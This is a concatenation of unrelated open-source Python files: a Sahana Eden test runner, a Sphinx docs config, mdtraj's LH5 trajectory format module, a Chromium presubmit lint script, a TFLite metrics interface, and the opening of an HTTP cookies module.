default = 16,
help = "The recursive depth when looking for links")
up_desc = """The user name and password, separated by a /. Multiple user name
and passwords can be added by separating them with a comma. If multiple user
name and passwords are provided then the same test will be run sequentially
using the given user in each case.
"""
parser.add_argument("--user-password",
default = "[email protected]/testing",
help = up_desc
)
parser.add_argument("--keep-browser-open",
help = "Keep the browser open once the tests have finished running",
action='store_const',
const = True)
desc = """Run the smoke tests even if debug is set to true.
With debug on it can add up to a second per link and given that a full run
of the smoke tests will include thousands of links the difference of having
this setting one can be measured in hours.
"""
parser.add_argument("--force-debug",
action='store_const',
const=True,
help = desc
)
argsObj = parser.parse_args()
args = argsObj.__dict__
# Selenium WebDriver
from selenium import webdriver
from selenium.common.exceptions import NoSuchElementException
from gluon import current
from gluon.storage import Storage
current.data = Storage()
# S3 Tests
from tests.web2unittest import *
from tests import *
# Read Settings
settings = current.deployment_settings
public_url = settings.get_base_public_url()
base_url = "%s/%s" % (public_url, current.request.application)
system_name = settings.get_system_name()
# Store these to be available to modules
config = current.test_config = Storage()
config.system_name = system_name
config.timeout = 5 # seconds
config.url = base_url
base_dir = os.path.join(os.getcwd(), "applications", current.request.application)
test_dir = os.path.join(base_dir, "modules", "tests")
config.base_dir = base_dir
if not args["suite"] == "smoke" and settings.get_ui_navigate_away_confirm():
print "The tests will fail unless you have settings.ui.navigate_away_confirm = False in models/000_config.py"
exit()
if args["suite"] == "smoke" or args["suite"] == "complete":
if settings.get_base_debug() and not args["force_debug"]:
print "settings.base.debug is set to True in 000_config.py, either set it to False or use the --force-debug switch"
exit()
config.verbose = args["verbose"]
browser_open = False
# @todo test with invalid class and methods passed as CLA
if args["method"]:
browser = config.browser = webdriver.Firefox()
browser.implicitly_wait(config.timeout)
browser_open = True
if args["class"]:
name = "%s.%s" % (args["class"], args["method"])
else:
name = args["method"]
suite = unittest.TestLoader().loadTestsFromName(args["method"],
globals()[args["class"]]
)
elif args["class"]:
browser = config.browser = webdriver.Firefox()
browser.implicitly_wait(config.timeout)
browser_open = True
suite = unittest.TestLoader().loadTestsFromTestCase(globals()[args["class"]])
elif args["suite"] == "smoke":
try:
from tests.smoke import *
broken_links = BrokenLinkTest()
broken_links.setDepth(args["link_depth"])
broken_links.setUser(args["user_password"])
suite = unittest.TestSuite()
suite.addTest(broken_links)
except NameError as msg:
from s3 import s3_debug
s3_debug("%s, unable to run the smoke tests." % msg)
pass
elif args["suite"] == "roles":
from tests.roles import *
#suite = unittest.TestSuite()
suite = test_roles()
#test_role = TestRole()
#test_role.set(org = "Org-A",
# user = "[email protected]",
# row_num = 0,
# method = "create",
# table = "org_organisation",
# c = None,
# f = None,
# record_id = 42,
# uuid = "uuid",
# permission = True)
#suite.addTest(test_role)
#suite = unittest.TestLoader().loadTestsFromTestCase(globals()[args["auth"]])
elif args["suite"] == "complete":
browser = config.browser = webdriver.Firefox()
browser.implicitly_wait(config.timeout)
browser_open = True
suite = loadAllTests()
try:
from tests.smoke import *
broken_links = BrokenLinkTest()
broken_links.setDepth(args["link_depth"])
broken_links.setUser(args["user_password"])
suite.addTest(broken_links)
except NameError as msg:
from s3 import s3_debug
s3_debug("%s, unable to run the smoke tests." % msg)
pass
else:
browser = config.browser = webdriver.Firefox()
browser.implicitly_wait(config.timeout)
browser_open = True
# Run all Tests
suite = loadAllTests()
config.html = False
if args["nohtml"]:
unittest.TextTestRunner(verbosity=config.verbose).run(suite)
else:
try:
path = args["html_path"]
if args["html_name_date"]:
filename = "Sahana-Eden-%s.html" % current.request.now.date()
else:
filename = "Sahana-Eden-%s.html" % current.request.now
# Windows compatibility
filename = filename.replace(":", "-")
fullname = os.path.join(path,filename)
fp = file(fullname, "wb")
config.html = True
from tests.runner import EdenHTMLTestRunner
runner = EdenHTMLTestRunner(
stream = fp,
title = "Sahana Eden",
verbosity = config.verbose,
)
runner.run(suite)
except ImportError:
config.html = False
unittest.TextTestRunner(verbosity=config.verbose).run(suite)
# Cleanup
if browser_open and not args["keep_browser_open"]:
browser.close()
| mit |
wangxhere/python-wpa-supplicant | docs/source/conf.py | 2 | 9398 | # -*- coding: utf-8 -*-
#
# python-wpa-supplicant documentation build configuration file, created by
# sphinx-quickstart on Wed Jun 3 14:30:47 2015.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
import shlex
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.todo',
'sphinx.ext.coverage',
'sphinx.ext.pngmath',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'python-wpa-supplicant'
copyright = u'2015, Stephen Stack'
author = u'Stephen Stack'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.1'
# The full version, including alpha/beta/rc tags.
release = '0.1'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = []
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = True
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'alabaster'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr'
#html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# Now only 'ja' uses this config value
#html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
#html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'python-wpa-supplicantdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
# Latex figure (float) alignment
#'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'python-wpa-supplicant.tex', u'python-wpa-supplicant Documentation',
u'Stephen Stack', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'python-wpa-supplicant', u'python-wpa-supplicant Documentation',
[author], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'python-wpa-supplicant', u'python-wpa-supplicant Documentation',
author, 'python-wpa-supplicant', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
| mpl-2.0 |
ctk3b/mdtraj | mdtraj/formats/lh5.py | 11 | 17930 | ##############################################################################
# MDTraj: A Python Library for Loading, Saving, and Manipulating
# Molecular Dynamics Trajectories.
# Copyright 2012-2014 Stanford University and the Authors
#
# Authors: Robert McGibbon, Kyle A. Beauchamp
# Contributors:
#
# MDTraj is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as
# published by the Free Software Foundation, either version 2.1
# of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with MDTraj. If not, see <http://www.gnu.org/licenses/>.
##############################################################################
""" MSMBuilder2 "LH5" trajectory format.
"""
##############################################################################
# Imports
##############################################################################
from __future__ import print_function, division
import os
import sys
import numpy as np
from mdtraj.core import element as elem
from mdtraj.utils.six import iteritems, PY3, u
from mdtraj.formats.registry import FormatRegistry
from mdtraj.utils import import_, ensure_type, in_units_of, cast_indices
from mdtraj.formats.hdf5 import _check_mode
import warnings
MAXINT16 = np.iinfo(np.int16).max
MAXINT32 = np.iinfo(np.int32).max
DEFAULT_PRECISION = 1000
if PY3:
basestring = str
__all__ = ['LH5TrajectoryFile', 'load_lh5']
##############################################################################
# Utilities
##############################################################################
def _topology_from_arrays(AtomID, AtomNames, ChainID, ResidueID, ResidueNames):
"""Build topology object from the arrays stored in the lh5 file"""
# Delayed import due to wacky recursive imports in compatibilty
from mdtraj import Topology
topology = Topology()
# assert that the ChainID is just an array of empty strings, which appears
# to be the case in our test systems for this legacy format
if not np.all(chainid == '' for chainid in ChainID):
raise NotImplementedError('Im not prepared to parse multiple chains')
chain0 = topology.add_chain()
# register the residues
registered_residues = {}
for i in np.argsort(ResidueID):
residue_name = ResidueNames[i]
if not isinstance(residue_name, basestring):
residue_name = residue_name.decode()
if ResidueID[i] not in registered_residues:
res = topology.add_residue(residue_name, chain0)
registered_residues[ResidueID[i]] = res
# register the atoms
for i in np.argsort(AtomID):
atom_name = AtomNames[i]
if not isinstance(atom_name, basestring):
atom_name = atom_name.decode()
element_symbol = atom_name.lstrip('0123456789')[0]
try:
element = elem.get_by_symbol(element_symbol)
except KeyError:
element = elem.virtual
topology.add_atom(atom_name, element,
registered_residues[ResidueID[i]])
topology.create_standard_bonds()
return topology
def _convert_from_lossy_integers(X, precision=DEFAULT_PRECISION):
"""Implementation of the lossy compression used in Gromacs XTC using
the pytables library. Convert 16 bit integers into 32 bit floats."""
X2 = X.astype("float32")
X2 /= float(precision)
return X2
def _convert_to_lossy_integers(X, precision=DEFAULT_PRECISION):
"""Implementation of the lossy compression used in Gromacs XTC using the pytables library. Convert 32 bit floats into 16 bit integers. These conversion functions have been optimized for memory use. Further memory reduction would require an in-place astype() operation, which one could create using ctypes."""
if np.max(X) * float(precision) < MAXINT16 and np.min(X) * float(precision) > -MAXINT16:
X *= float(precision)
Rounded = X.astype("int16")
X /= float(precision)
else:
raise ValueError("Data range too large for lh5. Try removing center of "
"mass motion, check for 'blowing up, or use a different "
"trajectory format")
return Rounded
##############################################################################
# Main code
##############################################################################
@FormatRegistry.register_loader('.lh5')
def load_lh5(filename, top=None, stride=None, atom_indices=None, frame=None):
"""Load an deprecated MSMBuilder2 LH5 trajectory file.
Parameters
----------
filename : str
filename of AMBER NetCDF file.
top : {str, Trajectory, Topology}
The NetCDF format does not contain topology information. Pass in either
the path to a pdb file, a trajectory, or a topology to supply this
information.
stride : int, default=None
Only read every stride-th frame
atom_indices : array_like, optional
If not none, then read only a subset of the atoms coordinates from the
file. This may be slightly slower than the standard read because it
requires an extra copy, but will save memory.
frame : int, optional
Use this option to load only a single frame from a trajectory on disk.
If frame is None, the default, the entire trajectory will be loaded.
If supplied, ``stride`` will be ignored.
See Also
--------
mdtraj.LH5TrajectoryFile : Low level interface to LH5 files
"""
atom_indices = cast_indices(atom_indices)
with LH5TrajectoryFile(filename) as f:
if frame is not None:
f.seek(frame)
n_frames = 1
else:
n_frames = None
return f.read_as_traj(n_frames=n_frames, stride=stride, atom_indices=atom_indices)
@FormatRegistry.register_fileobject('.lh5')
class LH5TrajectoryFile(object):
"""Interface for reading and writing to a MSMBuilder2 "LH5" molecular
dynamics trajectory file, a deprecated format.
Parameters
----------
filename : str
Path to the file to open
mode : {'r, 'w'}
Mode in which to open the file. 'r' is for reading and 'w' is for
writing
force_overwrite : bool
In mode='w', how do you want to behave if a file by the name of `filename`
already exists? if `force_overwrite=True`, it will be overwritten.
"""
distance_unit = 'nanometers'
def __init__(self, filename, mode='r', force_overwrite=True):
self._open = False
self.filename = filename
self.mode = mode
if mode == 'w' and not force_overwrite and os.path.exists(filename):
raise IOError('"%s" already exists' % filename)
# import tables
self.tables = import_('tables')
if mode == 'w':
print("Warning: The LH5 trajectory format is deprecated.", file=sys.stderr)
# what frame are we currently reading or writing at?
self._frame_index = 0
# do we need to write the header information?
self._needs_initialization = True
if not filename.endswith('.lh5'):
warnings.warn('The .lh5 extension is recommended.')
elif mode == 'r':
self._frame_index = 0
self._needs_initialization = False
else:
raise ValueError("mode must be one of ['r', 'w']")
# Compression style of legacy MSMBuilder2 lh5 trajectory format
compression = self.tables.Filters(
complib='blosc', shuffle=True, complevel=1)
self._handle = self._open_file(
filename, mode=mode, filters=compression)
self._open = True
@property
def topology(self):
"""Get the topology out from the file
Returns
-------
topology : mdtraj.Topology
A topology object
"""
if np.all(self._handle.root.AtomID[:] == 0) and (np.all(self._handle.root.AtomNames[:] == b'')
or np.all(self._handle.root.eAtomNames[:] == u(''))):
return None
return _topology_from_arrays(
self._handle.root.AtomID[:], self._handle.root.AtomNames[:],
self._handle.root.ChainID[:], self._handle.root.ResidueID[:],
self._handle.root.ResidueNames[:])
@topology.setter
def topology(self, top):
"""Set the topology in the file
Parameters
----------
top : mdtraj.Topology
A topology object
"""
_check_mode(self.mode, ('w',))
if self._needs_initialization:
self._initialize_headers(top.n_atoms)
self._needs_initialization = False
top, bonds = top.to_dataframe()
data = {
"AtomID": top.index.values + 1,
"AtomNames": top.name.values,
"ResidueNames": top.resName.values,
"ChainID": top.chainID.values,
"ResidueID": top.resSeq.values + 1,
}
for key, val in iteritems(data):
node = self._get_node(where='/', name=key)[:] = val[:]
node[:] = val[:]
def read_as_traj(self, n_frames=None, stride=None, atom_indices=None):
"""Read a trajectory from the LH5 file
Parameters
----------
n_frames : {int, None}
The number of frames to read. If not supplied, all of the
remaining frames will be read.
stride : {int, None}
By default all of the frames will be read, but you can pass this
flag to read a subset of of the data by grabbing only every
`stride`-th frame from disk.
atom_indices : {int, None}
By default all of the atom will be read, but you can pass this
flag to read only a subsets of the atoms for the `coordinates` and
`velocities` fields. Note that you will have to carefully manage
the indices and the offsets, since the `i`-th atom in the topology
will not necessarily correspond to the `i`-th atom in your subset.
Returns
-------
trajectory : Trajectory
A trajectory object containing the loaded portion of the file.
"""
_check_mode(self.mode, ('r',))
from mdtraj.core.trajectory import Trajectory
topology = self.topology
if atom_indices is not None:
topology = topology.subset(atom_indices)
initial = int(self._frame_index)
xyz = self.read(n_frames=n_frames, stride=stride, atom_indices=atom_indices)
if len(xyz) == 0:
return Trajectory(xyz=np.zeros((0, topology.n_atoms, 3)), topology=topology)
in_units_of(xyz, self.distance_unit, Trajectory._distance_unit, inplace=True)
if stride is None:
stride = 1
time = (stride*np.arange(len(xyz))) + initial
return Trajectory(xyz=xyz, topology=topology, time=time)
def read(self, n_frames=None, stride=None, atom_indices=None):
"""Read one or more frames of data from the file
Parameters
----------
n_frames : {int, None}
The number of frames to read. If not supplied, all of the
remaining frames will be read.
stride : {int, None}
By default all of the frames will be read, but you can pass this
flag to read a subset of of the data by grabbing only every
`stride`-th frame from disk.
atom_indices : {int, None}
By default all of the atom will be read, but you can pass this
flag to read only a subsets of the atoms for the `coordinates` and
`velocities` fields. Note that you will have to carefully manage
the indices and the offsets, since the `i`-th atom in the topology
will not necessarily correspond to the `i`-th atom in your subset.
Returns
-------
xyz : np.ndarray, shape=(n_frames, n_atoms, 3), dtype=np.float32
The cartesian coordinates, in nanometers
"""
_check_mode(self.mode, ('r'))
if n_frames is None:
n_frames = np.inf
if stride is not None:
stride = int(stride)
if atom_indices is None:
atom_slice = slice(None)
else:
atom_slice = ensure_type(atom_indices, dtype=np.int, ndim=1,
name='atom_indices', warn_on_cast=False)
total_n_frames = len(self._handle.root.XYZList)
frame_slice = slice(self._frame_index, min(
self._frame_index + n_frames, total_n_frames), stride)
if frame_slice.stop - frame_slice.start == 0:
return np.array([], dtype=np.float32)
xyz = self._handle.root.XYZList.__getitem__((frame_slice, atom_slice))
if xyz.dtype == np.int16 or xyz.dtype == np.int32:
xyz = _convert_from_lossy_integers(xyz)
self._frame_index += (frame_slice.stop - frame_slice.start)
return xyz
def write(self, coordinates):
"""Write one or more frames of data to the file
Parameters
----------
coordinates : np.ndarray, dtype=np.float32, shape=(n_frames, n_atoms, 3)
The cartesian coordinates of the atoms in every frame, in nanometers.
"""
_check_mode(self.mode, ('w'))
coordinates = ensure_type(coordinates, dtype=np.float32, ndim=3,
name='coordinates', shape=(None, None, 3), can_be_none=False,
warn_on_cast=False, add_newaxis_on_deficient_ndim=True)
if self._needs_initialization:
self._initialize_headers(coordinates.shape[1])
self._needs_initialization = False
coordinates = _convert_to_lossy_integers(coordinates)
self._get_node(where='/', name='XYZList').append(coordinates)
def _initialize_headers(self, n_atoms):
_check_mode(self.mode, ('w'))
self._create_carray(
where='/', name='AtomID', atom=self.tables.Int64Atom(), shape=(n_atoms,))
self._create_carray(
where='/', name='AtomNames', atom=self.tables.StringAtom(itemsize=4),
shape=(n_atoms,))
self._create_carray(
where='/', name='ResidueNames', atom=self.tables.StringAtom(itemsize=4),
shape=(n_atoms,))
self._create_carray(
where='/', name='ChainID', atom=self.tables.StringAtom(itemsize=1),
shape=(n_atoms,))
self._create_carray(
where='/', name='ResidueID', atom=self.tables.Int64Atom(), shape=(n_atoms,))
self._create_earray(
where='/', name='XYZList', atom=self.tables.Int16Atom(),
shape=(0, n_atoms, 3))
def seek(self, offset, whence=0):
"""Move to a new file position
Parameters
----------
offset : int
A number of frames.
whence : {0, 1, 2}
0: offset from start of file, offset should be >=0.
1: move relative to the current position, positive or negative
2: move relative to the end of file, offset should be <= 0.
Seeking beyond the end of a file is not supported
"""
_check_mode(self.mode, ('r',))
if whence == 0 and offset >= 0:
self._frame_index = offset
elif whence == 1:
self._frame_index = self._frame_index + offset
elif whence == 2 and offset <= 0:
self._frame_index = len(self._handle.root.XYZList) + offset
else:
raise IOError('Invalid argument')
def tell(self):
"""Current file position
Returns
-------
offset : int
The current frame in the file.
"""
return int(self._frame_index)
def close(self):
"Close the HDF5 file handle"
if self._open:
self._handle.close()
self._open = False
def flush(self):
"Write all buffered data in the to the disk file."
if self._open:
self._handle.flush()
def __len__(self):
"Number of frames in the file"
if not self._open:
raise ValueError('I/O operation on closed file')
return len(self._handle.root.XYZList)
def __del__(self):
self.close()
def __enter__(self):
"Support the context manager protocol"
return self
def __exit__(self, *exc_info):
"Support the context manager protocol"
self.close()
# pytables 2/3 compatibility. pytables3 throws really annoying pending
# deprecation warnings if you dont use the new method names
@property
def _open_file(self):
if self.tables.__version__ >= '3.0.0':
return self.tables.open_file
return self.tables.openFile
@property
def _remove_node(self):
if self.tables.__version__ >= '3.0.0':
return self._handle.remove_node
return self._handle.removeNode
@property
def _create_carray(self):
if self.tables.__version__ >= '3.0.0':
return self._handle.create_carray
return self._handle.createCArray
@property
def _create_earray(self):
if self.tables.__version__ >= '3.0.0':
return self._handle.create_earray
return self._handle.createEArray
@property
def _get_node(self):
if self.tables.__version__ >= '3.0.0':
return self._handle.get_node
return self._handle.getNode
| lgpl-2.1 |
xhteam/external-chromium | googleurl/PRESUBMIT.py | 93 | 3371 | #!/usr/bin/python
# Copyright (c) 2009 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Top-level presubmit script for googleurl.
See http://dev.chromium.org/developers/how-tos/depottools/presubmit-scripts for
details on the presubmit API built into gcl.
"""
# Files with these extensions will be considered source files
SOURCE_FILE_EXTENSIONS = [
'.c', '.cc', '.cpp', '.h', '.m', '.mm', '.py', '.mk', '.am', '.json',
]
EXCLUDED_PATHS = [
r".*third_party[\\\/].*",
]
def ReadFile(path):
"""Given a path, returns the full contents of the file.
Reads files in binary format.
"""
fo = open(path, 'rb')
try:
contents = fo.read()
finally:
fo.close()
return contents
def CheckChangeOnUpload(input_api, output_api):
# TODO(brettw) Enforce 80 cols.
return LocalChecks(input_api, output_api, max_cols=0)
def CheckChangeOnCommit(input_api, output_api):
# TODO(brettw) Enforce 80 cols.
return (LocalChecks(input_api, output_api, max_cols=0) +
input_api.canned_checks.CheckDoNotSubmit(input_api, output_api))
def LocalChecks(input_api, output_api, max_cols=80):
"""Reports an error if for any source file in SOURCE_FILE_EXTENSIONS:
- uses CR (or CRLF)
- contains a TAB
- has a line that ends with whitespace
- contains a line >|max_cols| cols unless |max_cols| is 0.
Note that the whole file is checked, not only the changes.
"""
cr_files = []
results = []
excluded_paths = [input_api.re.compile(x) for x in EXCLUDED_PATHS]
files = input_api.AffectedFiles()
for f in files:
path = f.LocalPath()
root, ext = input_api.os_path.splitext(path)
# Look for unsupported extensions.
if not ext in SOURCE_FILE_EXTENSIONS:
continue
# Look for excluded paths.
found = False
for item in excluded_paths:
if item.match(path):
found = True
break
if found:
continue
# Need to read the file ourselves since AffectedFile.NewContents()
# will normalize line endings.
contents = ReadFile(path)
if '\r' in contents:
cr_files.append(path)
local_errors = []
# Remove EOL character.
lines = contents.splitlines()
line_num = 1
for line in lines:
if line.endswith(' '):
local_errors.append(output_api.PresubmitError(
'%s, line %s ends with whitespaces.' %
(path, line_num)))
# Accept lines with http:// to exceed the max_cols rule.
if max_cols and len(line) > max_cols and not 'http://' in line:
local_errors.append(output_api.PresubmitError(
'%s, line %s has %s chars, please reduce to %d chars.' %
(path, line_num, len(line), max_cols)))
if '\t' in line:
local_errors.append(output_api.PresubmitError(
"%s, line %s contains a tab character." %
(path, line_num)))
line_num += 1
# Just show the first 5 errors.
if len(local_errors) == 6:
local_errors.pop()
local_errors.append(output_api.PresubmitError("... and more."))
break
results.extend(local_errors)
if cr_files:
results.append(output_api.PresubmitError(
'Found CR (or CRLF) line ending in these files, please use only LF:',
items=cr_files))
return results
| bsd-3-clause |
paolodedios/tensorflow | tensorflow/lite/python/metrics_interface.py | 6 | 1570 | # Lint as: python2, python3
# Copyright 2021 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Python TFLite metrics helper interface."""
import abc
class TFLiteMetricsInterface(metaclass=abc.ABCMeta):
"""Abstract class for TFLiteMetrics."""
@abc.abstractmethod
def increase_counter_debugger_creation(self):
raise NotImplementedError
@abc.abstractmethod
def increase_counter_interpreter_creation(self):
raise NotImplementedError
@abc.abstractmethod
def increase_counter_converter_attempt(self):
raise NotImplementedError
@abc.abstractmethod
def increase_counter_converter_success(self):
raise NotImplementedError
@abc.abstractmethod
def set_converter_param(self, name, value):
raise NotImplementedError
@abc.abstractmethod
def set_converter_error(self, error_data):
raise NotImplementedError
@abc.abstractmethod
def set_converter_latency(self, value):
raise NotImplementedError
| apache-2.0 |
pombredanne/teamwork | w2/static/Brython2.0.0-20140209-164925/Lib/http/cookies.py | 735 | 20810 | #!/usr/bin/env python3
#
####
# Copyright 2000 by Timothy O'Malley <[email protected]>
#
# All Rights Reserved
#
# Permission to use, copy, modify, and distribute this software
# and its documentation for any purpose and without fee is hereby
# granted, provided that the above copyright notice appear in all
# copies and that both that copyright notice and this permission
# notice appear in supporting documentation, and that the name of
# Timothy O'Malley not be used in advertising or publicity
# pertaining to distribution of the software without specific, written
# prior permission.
#
# Timothy O'Malley DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS
# SOFTWARE, INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY
# AND FITNESS, IN NO EVENT SHALL Timothy O'Malley BE LIABLE FOR
# ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS,
# WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS
# ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR
# PERFORMANCE OF THIS SOFTWARE.
#
####
#
# Id: Cookie.py,v 2.29 2000/08/23 05:28:49 timo Exp
# by Timothy O'Malley <[email protected]>
#
# Cookie.py is a Python module for the handling of HTTP
# cookies as a Python dictionary. See RFC 2109 for more
# information on cookies.
#
# The original idea to treat Cookies as a dictionary came from
# Dave Mitchell ([email protected]) in 1995, when he released the
# first version of nscookie.py.
#
####
r"""
Here's a sample session to show how to use this module.
At the moment, this is the only documentation.
The Basics
----------
Importing is easy...
>>> from http import cookies
Most of the time you start by creating a cookie.
>>> C = cookies.SimpleCookie()
Once you've created your Cookie, you can add values just as if it were
a dictionary.
>>> C = cookies.SimpleCookie()
>>> C["fig"] = "newton"
>>> C["sugar"] = "wafer"
>>> C.output()
'Set-Cookie: fig=newton\r\nSet-Cookie: sugar=wafer'
Notice that the printable representation of a Cookie is the
appropriate format for a Set-Cookie: header. This is the
default behavior. You can change the header and printed
attributes by using the .output() function
>>> C = cookies.SimpleCookie()
>>> C["rocky"] = "road"
>>> C["rocky"]["path"] = "/cookie"
>>> print(C.output(header="Cookie:"))
Cookie: rocky=road; Path=/cookie
>>> print(C.output(attrs=[], header="Cookie:"))
Cookie: rocky=road
The load() method of a Cookie extracts cookies from a string. In a
CGI script, you would use this method to extract the cookies from the
HTTP_COOKIE environment variable.
>>> C = cookies.SimpleCookie()
>>> C.load("chips=ahoy; vienna=finger")
>>> C.output()
'Set-Cookie: chips=ahoy\r\nSet-Cookie: vienna=finger'
The load() method is darn-tootin smart about identifying cookies
within a string. Escaped quotation marks, nested semicolons, and other
such trickeries do not confuse it.
>>> C = cookies.SimpleCookie()
>>> C.load('keebler="E=everybody; L=\\"Loves\\"; fudge=\\012;";')
>>> print(C)
Set-Cookie: keebler="E=everybody; L=\"Loves\"; fudge=\012;"
Each element of the Cookie also supports all of the RFC 2109
Cookie attributes. Here's an example which sets the Path
attribute.
>>> C = cookies.SimpleCookie()
>>> C["oreo"] = "doublestuff"
>>> C["oreo"]["path"] = "/"
>>> print(C)
